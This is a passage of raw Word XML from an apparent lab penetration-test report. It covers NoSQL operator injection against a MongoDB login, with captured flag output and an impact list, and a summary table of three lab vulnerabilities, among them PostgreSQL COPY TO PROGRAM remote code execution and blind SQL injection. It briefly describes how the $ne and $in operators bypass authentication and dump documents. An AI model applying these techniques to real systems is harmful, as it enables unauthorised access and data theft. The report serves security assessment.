      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    owner </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B5756" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    title </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIDENTIAL — Internal Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0272491A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>content :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nosql_operator_I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LOVE $$ &lt;3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B092A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG CAPTURED: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nosql_operator_I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LOVE $$ &lt;3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B7C3C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="38E9CA76" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Impact Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08E156" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Complete authentication </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>bypass —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> any MongoDB-backed login is bypassed without knowing any valid credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9A397" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Username enumeration — the $in operator discovers valid usernames from a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>guesslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a single request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5C1BB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Full document exfiltration — $ne: null in any owner/filter field returns every document in the collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5EFBD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Horizontal privilege escalation — attacker can impersonate any user and access their documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EAE01A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Hidden data exposure — documents with no user-facing owner (like the system flag) are exposed despite being unreachable through normal application flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4395C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="57BAE696" w14:textId="788030AC" w:rsidR="00E13696" w:rsidRDefault="00AC12E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D82F57" wp14:editId="60CB107A">
            <wp:extent cx="6400800" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107989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98160" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="2609850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CFCB5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>nosql_operator_I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve"> LOVE $$ &lt;3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304E4532" w14:textId="73A18788" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9" w:rsidP="00AC12E9"/>
    <w:p w14:paraId="3B679C20" w14:textId="58BEF1C7" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>6. Summary Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD56A3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The table below provides a side-by-side comparison of all three vulnerabilities assessed in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16516AFB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E136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2"/>
        <w:gridCol w:w="1030"/>
        <w:gridCol w:w="1172"/>
        <w:gridCol w:w="1039"/>
        <w:gridCol w:w="716"/>
        <w:gridCol w:w="1190"/>
        <w:gridCol w:w="3759"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E13696" w14:paraId="152BC075" w14:textId="77777777">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C81E8C3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>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ECB68EB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C84BE4F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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B85CCB8" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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70B7785" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</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0DF530DD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>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2605864" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="2C1C3035"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8310F6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL RCE (CVE-2019-9193)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2E79A5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OS Command Injection via SQL</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FD8556" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL 12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F0F847" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</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7192EF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0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1EBE2E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vuln1-app :5001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72BF27" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>postgres_rce_copy_to_program</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="0AF8DD25"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072309A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blind SQL Injection (CWE-89)</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7BF6B7F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Boolean-Based Blind SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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58BC207" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL 8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>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2D9F46AF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</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2676DA2" w14:textId="1D08B985" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidR="001E207A">
              <w:rPr>
                <w:color w:val="1A1A1A"/>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4E5B352" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vuln2-app :5002</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B1D37F7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>blind_sqli_char_by_char_exfil_success</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="122AE9E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4882D3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>NoSQL Operator Injection (CWE-943)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CF9CD6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Auth Bypass + Data Exfil</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C0A2D3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MongoDB 6.0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332D67" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</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619D76" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1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E297ED" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vuln3-app :5003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EB33B2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nosql_operator_I</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LOVE $$ &lt;3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135C7CF8" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="5E32EA18" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="2BF227F9" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="4CAD567C" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="75004398" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="4F63A8CF" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="3F9B4292" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="6ACCE725" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="284A33CC" w14:textId="77777777" w:rsidR="00AC12E9" w:rsidRDefault="00AC12E9"/>
    <w:p w14:paraId="624B76CE" w14:textId="51CC5E4B" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04199FBF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>7. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66120CDE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>National Vulnerability Database — CVE-2019-9193: https://nvd.nist.gov/vuln/detail/CVE-2019-9193</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D84A07A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>PostgreSQL Documentation — COPY: https://www.postgresql.org/docs/12/sql-copy.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D3D84" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
